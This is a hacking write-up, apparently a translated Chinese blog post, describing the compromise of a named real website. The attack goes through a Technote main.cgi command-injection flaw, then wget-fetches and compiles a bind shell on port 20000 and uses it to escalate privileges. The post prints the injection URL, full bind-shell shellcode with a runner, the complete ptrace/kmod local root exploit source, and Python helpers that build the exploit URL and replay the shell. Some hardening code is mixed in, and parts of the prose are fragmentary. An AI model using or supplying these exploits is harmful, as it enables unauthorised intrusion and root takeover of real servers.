Hello everyone … so I wrote this up.
Lately I have been studying Perl and UNIX servers at home … let's have a look around.

… I learned that this is Technote's main.cgi: the vulnerability lets an attacker execute arbitrary commands on the system with the privileges of the web server process, because the contents of the 'filename' parameter are not filtered correctly (a shell metacharacter such as | in that value is passed through and executed) … The exploitation method given (the probe URL, reassembled from the fragments on the page):

http://[target]/cgi-bin/technote/main.cgi?_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id
I looked at the exploitation method and thought it was very simple … I looked at it for a long time … change the path … very high … ^_^.

OK, let's start this rare … google.com really is convenient … http://www.sealia.com/cgi-bin/technote/main.cgi … Following the method NSFOCUS (绿盟) gave … the result is shown in Figure 1:

![](http://www.crazycoder.cn/WebFiles/20099/975d79b9-755d-42f8-8a9d-6881b3b806a2.gif)

You can all see the result: the command ran as the web server's user,

uid=99(nobody) gid=99(nobody) groups=99(nobody)
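As an added example, not code from the post and not Technote's own source (which the page does not show): a Python model of the bug class behind that probe. The request parameter is spliced into a shell command line, so the `|` in `rb9.txt|id` ends the file read and starts a second command, which runs as the web server's user; beside it is a hardened handler that allow-lists the name, confines the resolved path and reads the file with no shell at all. The board directory, the `cat` command line and the percent-encoding helper are assumptions made for the example; `main.cgi` is the script path as reassembled from the page.

```python
import os
import re
import subprocess
import tempfile
from urllib.parse import quote

# Constructed sample board directory with one real attachment so the example runs
# offline (assumption: attachments live in a per-board directory; not shown on the page).
BOARD_DIR = tempfile.mkdtemp(prefix="technote_board_")
with open(os.path.join(BOARD_DIR, "rb9.txt"), "w") as fh:
    fh.write("attachment contents\n")


def vulnerable_down_load(filename: str) -> str:
    """Model of the bug class: the request parameter is spliced into a shell command
    line, so the '|' in rb9.txt|id ends the cat and starts a second command.
    (Assumption: the page only says 'filename' is filtered incorrectly and shows the
    pipe probe; Technote's actual code is not on the page.)"""
    cmd = f"cat {BOARD_DIR}/{filename}"
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout


SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def hardened_down_load(filename: str) -> str:
    """Allow-list the name, confine the resolved path to the board directory and read
    the file directly: no shell, so metacharacters have nothing to reach."""
    if not SAFE_NAME.fullmatch(filename) or ".." in filename:
        raise ValueError(f"rejected filename {filename!r}")
    base = os.path.realpath(BOARD_DIR)
    path = os.path.realpath(os.path.join(base, filename))
    if os.path.dirname(path) != base:
        raise ValueError("path escapes board directory")
    with open(path) as fh:
        return fh.read()


def exploit_url(target: str, board: str, cmd: str) -> str:
    """The advisory's probe with the injected value percent-encoded, so '|' and spaces
    survive any client or proxy on the way (main.cgi as reassembled from the page)."""
    injected = quote("rb9.txt|" + cmd, safe="")
    return (f"http://{target}/cgi-bin/technote/main.cgi"
            f"?board={board}&command=down_load&filename={injected}")


if __name__ == "__main__":
    print(exploit_url("[target]", "rebarz99", "id"))
    print("vulnerable:", vulnerable_down_load("rb9.txt|id").strip())
    try:
        hardened_down_load("rb9.txt|id")
    except ValueError as err:
        print("hardened:", err)
```

The hardened version rejects the probe before any file system access; the only way to read an attachment is by a name that matches the allow-list and resolves inside the board directory.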
Next I'll start using the … program I wrote myself … my program …:

![](http://www.crazycoder.cn/WebFiles/20099/0e1fd06b-05c2-4a9e-b387-82cc8460a6cb.gif)

Enter the IP and port in turn … the program … as in Figure 3:

![](http://www.crazycoder.cn/WebFiles/20099/4910520e-b037-4e56-89c6-c665d48e3941.gif)
Heh, at this point I think you all … actually I have the same … not bad … as in Figure 4:

![](http://www.crazycoder.cn/WebFiles/20099/fec0ca84-3b3a-4a28-b385-6cca09ce8b2f.gif)

Heh, we have already got /etc/passwd.
… go and read the threads on forum.zone-h.org … as in Figure 5:

![](http://www.crazycoder.cn/WebFiles/20099/ef820289-cef0-43ec-b652-aefb47454406.gif)

Heh, forgive my clumsiness … the program … This is the bind-shell source (shell-bind-shell.c from shellcode.org, the download address is given below):
```c
/*
 * Linux/x86 bind shell on TCP port 20000 (shellcode.org, shell-bind-shell.c).
 * The shellcode bytes and their comments are as printed on the page; the C
 * wrapper around them was garbled in extraction and is reconstructed from its
 * surviving fragments (print the payload, then jump to it).
 *
 * Written for a 2005-era box whose data segment is executable; on a modern
 * toolchain build with:  gcc -m32 -z execstack -o bind shell-bind-shell.c
 */
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xdb"              // xor ebx, ebx
    "\xf7\xe3"              // mul ebx             (eax = edx = 0)
    "\xb0\x66"              // mov al, 102         (socketcall)
    "\x53"                  // push ebx            (protocol 0)
    "\x43"                  // inc ebx
    "\x53"                  // push ebx            (SOCK_STREAM = 1)
    "\x43"                  // inc ebx
    "\x53"                  // push ebx            (AF_INET = 2)
    "\x89\xe1"              // mov ecx, esp
    "\x4b"                  // dec ebx             (SYS_SOCKET = 1)
    "\xcd\x80"              // int 0x80            -> socket()
    "\x89\xc7"              // mov edi, eax        (listening fd)
    "\x52"                  // push edx            (INADDR_ANY)
    "\x66\x68\x4e\x20"      // push word 8270      (bytes 4e 20 = port 20000 in network order)
    "\x43"                  // inc ebx
    "\x66\x53"              // push bx             (AF_INET)
    "\x89\xe1"              // mov ecx, esp        (struct sockaddr_in)
    "\xb0\xef"              // mov al, 239
    "\xf6\xd0"              // not al              (al = 16 = sizeof(struct sockaddr_in))
    "\x50"                  // push eax
    "\x51"                  // push ecx
    "\x57"                  // push edi
    "\x89\xe1"              // mov ecx, esp
    "\xb0\x66"              // mov al, 102
    "\xcd\x80"              // int 0x80            -> bind()   (SYS_BIND = 2)
    "\xb0\x66"              // mov al, 102
    "\x43"                  // inc ebx
    "\x43"                  // inc ebx
    "\xcd\x80"              // int 0x80            -> listen() (SYS_LISTEN = 4)
    "\x50"                  // push eax
    "\x50"                  // push eax
    "\x57"                  // push edi
    "\x89\xe1"              // mov ecx, esp
    "\x43"                  // inc ebx
    "\xb0\x66"              // mov al, 102
    "\xcd\x80"              // int 0x80            -> accept() (SYS_ACCEPT = 5)
    "\x89\xd9"              // mov ecx, ebx
    "\x89\xc3"              // mov ebx, eax        (client fd)
    "\xb0\x3f"              // lp: mov al, 63      (dup2)
    "\x49"                  // dec ecx
    "\xcd\x80"              // int 0x80            -> dup2(client, ecx)
    "\x41"                  // inc ecx
    "\xe2\xf8"              // loop lp             (ecx runs 4,3,2,1,0: stdin/out/err now the socket)
    "\x51"                  // push ecx            (NUL terminator, ecx == 0 here)
    "\x68\x6e\x2f\x73\x68"  // push dword 68732f6eh ("n/sh")
    "\x68\x2f\x2f\x62\x69"  // push dword 69622f2fh ("//bi")
    "\x89\xe3"              // mov ebx, esp        ("//bin/sh")
    "\x51"                  // push ecx            (argv[1] = NULL)
    "\x53"                  // push ebx            (argv[0])
    "\x89\xe1"              // mov ecx, esp        (argv)
    "\xb0\xf4"              // mov al, 244
    "\xf6\xd0"              // not al              (al = 11 = execve)
    "\xcd\x80";             // int 0x80            -> execve("//bin/sh", argv, NULL): no environment

int main(void)
{
    void (*a)(void);
    int i;

    printf("Shellcode length: %d bytes\n", (int)strlen(shellcode));
    for (i = 0; i < (int)strlen(shellcode); i++)
        printf("\\x%02x", (unsigned char)shellcode[i]);
    printf("\n");

    a = (void (*)(void))shellcode;
    a();                    /* binds port 20000 and hands /bin/sh to the first client */
    return 0;
}
```
OK, now that we know the download address, http://shellcode.org/Shellcode/Linux/shell-bind-shell.c, we can fetch it with the wget command:

wget http://shellcode.org/Shellcode/Linux/shell-bind-shell.c -P /tmp

which means: download this shell.c into the /tmp directory.

![](http://www.crazycoder.cn/WebFiles/20099/a5b5b159-0ebf-4aa4-bef3-3183926fcfc2.gif)

Then ls /tmp gives the following:

2bd lost+found mremap_pte.c mysql.sock ptrace.c sess_0a3d59b6da83717a4c05fbc5c6429982 sess_12981c19e4cdab7bc426af965e7c85de sess_33c246570a69e0846eaaedaef61f0402 sess_4eb43cb41a450e8a7d15998fe4e9ef82 sess_5c2048e3188733f41bba9a1ab44a4f3b sess_6405a9b3e0a809d7f298ad598f5de180 sess_67fc6892112d2d780a092664353dcbba sess_9e3a2581194c05f598543f10294a95ed sess_a0332a716e5c0a0932331ce9a5ec64d2 sess_a159ec1f21a671d5cfe201c384d8da1c sess_c6f579b218f096eb5ba11fdbad90f248 sess_cdea344ed2940c99c1fcc146c5322882 sess_f1e8e705bb1a6c5197ab61a22442da90 shell-bind-shell.c shell-bind-shell.c.1 ssh-XX0CyKEc ssh-XX7eRJNn ssh-XX89utqm ssh-XXEmor9X ssh-XXhC36Gw ssh-XXpOcVIA ssh-XXrhx8en ssh-XXss6aKs ssh-XXw2rzSs

Two details in that listing are worth a second look: wget saved the file as shell-bind-shell.c.1 because a shell-bind-shell.c was already there, and two other source files, mremap_pte.c and ptrace.c, are already sitting in /tmp.
This shows it succeeded. … It would be a problem if there were no gcc … :

[www.sealia.com]$ whereis -b gcc

The reply comes back as the raw HTTP response, headers and chunk framing included:

Date: Sat, 29 Jan 2005 22:21:06 GMT
Server: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18
Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;
Set-Cookie: koX8iT3Dda=-kleadata1-;
Transfer-Encoding: chunked
Content-Type: text/plain

12
gcc: /usr/bin/gcc

(The 12 is not part of the command output: it is the chunk length in hex, 18 bytes, of "gcc: /usr/bin/gcc" plus its newline.)
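The raw response above shows why the tool prints a stray 12 before the command output: the body is chunk-framed, and 12 is the hex length (18 bytes) of "gcc: /usr/bin/gcc\n". As an added example, not the author's tool (whose code is not on the page), here is a Python parser that splits such a raw response into status line, headers and body and strips the chunk framing; the status line in the sample is assumed, since the page does not show it.

```python
# Constructed from the raw response the author's tool printed for 'whereis -b gcc'.
# The status line is not on the page, so an HTTP/1.1 200 line is assumed.
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 29 Jan 2005 22:21:06 GMT\r\n"
    b"Server: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18\r\n"
    b"Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;\r\n"
    b"Set-Cookie: koX8iT3Dda=-kleadata1-;\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"12\r\n"                    # chunk size in hex: 0x12 = 18 bytes
    b"gcc: /usr/bin/gcc\n\r\n"   # 18 bytes of data, then the chunk's own CRLF
    b"0\r\n\r\n"                 # last chunk, no trailers
)


def split_response(raw: bytes):
    """Split a raw response into (status line, headers, undecoded body).
    Header names are lower-cased; repeated headers (Set-Cookie) keep every value."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower().decode(), []).append(value.strip().decode())
    return lines[0].decode(), headers, body


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a chunked body: <hex size>[;ext]CRLF <data>CRLF ... 0CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)                    # ValueError if truncated
        size = int(body[pos:eol].split(b";")[0], 16)      # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2
    return bytes(out)


def command_output(raw: bytes) -> str:
    """What the injected command actually printed, with the transport framing removed."""
    status, headers, body = split_response(raw)
    encodings = [v.lower() for v in headers.get("transfer-encoding", [])]
    if "chunked" in encodings:
        body = decode_chunked(body)
    elif "content-length" in headers:
        body = body[:int(headers["content-length"][0])]
    return body.decode("utf-8", "replace")


if __name__ == "__main__":
    print(command_output(RAW_RESPONSE), end="")
```

Checking the chunk length against the data is what keeps a hand-rolled client from silently swallowing part of the output when the server splits it into several chunks.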
Good, gcc is found. … the program … Compilation succeeded and /tmp now has one more … program …:

/tmp/bind

… the program … we know it opened port 20000 … Haha, connected! At this point I blindly typed id;uname -a and, ugh, why does "command not found" come up? … the program …

Note: To use this you will need to make sure that you append '\n\0' to your entered string … (nc is netcat).

OK, now I know why … :

![](http://www.crazycoder.cn/WebFiles/20099/186b9724-9613-4bfa-bf96-28160a3700f0.gif)
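What the bind shell does on the wire, as an added example that is neither the post's code nor shellcode.org's: a Python replay of the shellcode's syscall sequence (socket, bind, listen, accept, dup2 onto 0/1/2, execve of /bin/sh with an empty environment) on 127.0.0.1 with an OS-chosen port instead of 0.0.0.0:20000, plus a netcat-style client that frames each command with a bare '\n', which is what the note about '\n\0' is asking for. The second command is deliberately sent with CRLF to show one reason a bind shell answers "command not found" to a perfectly good command: the shell receives 'true\r' as the command name. Whether that is what happened in the session above the page does not say; it is a caveat worth knowing when the client is a Windows netcat.

```python
import os
import socket


def frame_command(cmd: str) -> bytes:
    """The shell behind the socket reads whole lines, so terminate each command with
    '\n' only.  A client that sends CRLF leaves the '\r' on the command name, and the
    shell then looks for a command called 'id\r'."""
    return cmd.rstrip("\r\n").encode() + b"\n"


def start_loopback_bind_shell() -> tuple:
    """Same sequence the shellcode performs, but on 127.0.0.1 and an OS-chosen port.
    Returns (child pid, port); the child plays the role of /tmp/bind."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    pid = os.fork()
    if pid == 0:
        cli, _ = srv.accept()
        for fd in (0, 1, 2):                       # the shellcode's dup2 loop
            os.dup2(cli.fileno(), fd)
        try:
            os.execve("/bin/sh", ["/bin/sh"], {})  # envp is NULL in the shellcode
        finally:
            os._exit(127)                          # only reached if execve fails
    srv.close()
    return pid, port


def talk(port: int, commands: list) -> str:
    """Connect the way netcat would, send the framed commands, read until the shell exits."""
    with socket.create_connection(("127.0.0.1", port), timeout=10) as s:
        for c in commands:
            s.sendall(c)
        s.sendall(b"exit\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def demo() -> str:
    """One correctly framed command and one CRLF-framed command against the loopback shell."""
    pid, port = start_loopback_bind_shell()
    out = talk(port, [frame_command("echo marker"), b"true\r\n"])
    os.waitpid(pid, 0)
    return out


if __name__ == "__main__":
    print(demo())
```

The shell's stderr is on the socket too (fd 2 was dup2'd), so the "not found" complaint about `true\r` arrives on the same connection as the `echo` output, exactly as it would from the real /tmp/bind.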
Heh, at this point our lovely … the program … the program is the Linux kernel ptrace/kmod local root exploit; its source follows:
```c
/*
 * Linux kernel ptrace/kmod local root exploit
 *
 * This code exploits a race condition in kernel/kmod.c, which creates
 * kernel thread in insecure manner. This bug allows to ptrace cloned
 * process, allowing to take control over privileged modprobe binary.
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 *
 * I discovered this stupid bug independently ...
 *
 * (The rest of this header, the #includes, the progress messages and the
 * keywords the page shows as icons did not survive extraction; they are
 * restored below so the file compiles as a 32-bit binary:
 *     gcc -m32 -o ptrace ptrace.c
 * It targets i386 2.2/2.4 kernels and needs regs.eip from the i386
 * struct user_regs_struct.)
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <sys/user.h>

/* Runs inside the root-owned modprobe: chown(path, 0, 0); chmod(path, 06755);
 * exit(0).  putcode() appends the path of this very binary right after the
 * code; the trailing call pushes that path's address for the pop ebx. */
char cliphcode[] =
	"\x90\x90\xeb\x1f\xb8\xb6\x00\x00"   /* nop; nop; jmp +0x1f; mov eax, 182 (chown)      */
	"\x00\x5b\x31\xc9\x89\xca\xcd\x80"   /* pop ebx (path); ecx = edx = 0; int 0x80        */
	"\xb8\x0f\x00\x00\x00\xb9\xed\x0d"   /* mov eax, 15 (chmod); mov ecx, 0xded (06755)    */
	"\x00\x00\xcd\x80\x89\xd0\x89\xd3"   /* int 0x80; eax = ebx = 0                         */
	"\x40\xcd\x80\xe8\xdc\xff\xff\xff";  /* inc eax (exit); int 0x80; call back to pop ebx */

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;

volatile int gotchild = 0;

/* No exit(): one of the three kills is always ourselves. */
void fatal(char * msg)
{
	perror(msg);
	kill(parent, SIGKILL);
	kill(child, SIGKILL);
	kill(victim, SIGKILL);
}

/* Write shellcode + our own path into the traced modprobe at dst, a word at a time. */
void putcode(unsigned long * dst)
{
	char buf[MAXPATHLEN + CODE_SIZE];
	unsigned long * src;
	int i, len;

	memcpy(buf, cliphcode, CODE_SIZE);
	len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
	if (len == -1)
		fatal("[-] Unable to read /proc/self/exe");

	len += CODE_SIZE + 1;
	buf[len] = '\0';

	src = (unsigned long*) buf;
	for (i = 0; i < len; i += 4)
		if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
			fatal("[-] Unable to write shellcode");
}

/* First SIGCHLD: the attach stopped the victim.  Second: it stopped at a
 * syscall; overwrite the code at eip and let it run as root. */
void sigchld(int signo)
{
	struct user_regs_struct regs;

	if (gotchild++ == 0)
		return;

	fprintf(stderr, "[+] Signal caught\n");

	if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
		fatal("[-] Unable to read registers");

	fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

	putcode((unsigned long *)regs.eip);

	fprintf(stderr, "[+] Now wait for suid shell...\n");

	if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
		fatal("[-] Unable to detach from victim");

	exit(0);
}

void sigalrm(int signo)
{
	errno = ECANCELED;
	fatal("[-] Fatal error");
}

/* The victim is the kernel thread that kmod spawns for modprobe; its pid is
 * predicted as ours + 1, and we spin on PTRACE_ATTACH until it exists. */
void do_child(void)
{
	int err;

	child = getpid();
	victim = child + 1;

	signal(SIGCHLD, sigchld);

	do
		err = ptrace(PTRACE_ATTACH, victim, 0, 0);
	while (err == -1 && errno == ESRCH);

	if (err == -1)
		fatal("[-] Unable to attach");

	fprintf(stderr, "[+] Attached to %d\n", victim);

	while (!gotchild) ;

	if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
		fatal("[-] Unable to setup syscall trace");

	fprintf(stderr, "[+] Waiting for signal\n");

	for(;;);
}

/* socket() on an unknown family makes the kernel request_module() -> modprobe,
 * which is the thread the child is racing to attach.  Then wait until the
 * shellcode has made this binary setuid root and re-run it. */
void do_parent(char * progname)
{
	struct stat st;
	int err;

	errno = 0;
	socket(AF_SECURITY, SOCK_STREAM, 1);
	do {
		err = stat(progname, &st);
	} while (err == 0 && (st.st_mode & S_ISUID) == 0);

	if (err == -1)
		fatal("[-] Unable to stat myself");

	alarm(0);
	system(progname);
}

/* On the second run (now setuid root) just drop into a root shell. */
void prepare(void)
{
	if (geteuid() == 0) {
		initgroups("root", 0);
		setgid(0);
		setuid(0);
		execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
		fatal("[-] Unable to spawn shell");
	}
}

int main(int argc, char ** argv)
{
	prepare();
	signal(SIGALRM, sigalrm);
	alarm(10);

	parent = getpid();
	child = fork();
	victim = child + 1;

	if (child == -1)
		fatal("[-] Unable to fork");

	if (child == 0)
		do_child();
	else
		do_parent(argv[0]);

	return 0;
}
```

Save it with CTRL+C. …